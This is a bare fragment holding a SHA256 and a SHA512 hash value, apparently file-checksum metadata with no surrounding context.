SHA256056dc56035a562b5296aca8b8ab1dbf742c36f4d1830885ea7302944d04d1d79
SHA5121d6c98715cf7e38ce21c697f0976c95c8f183a04a2f32372f58c18bb1d5881ffa67910ce96b765dab7f15cfcc983d051448c4a1b4557170c18a04ec3e2b1d616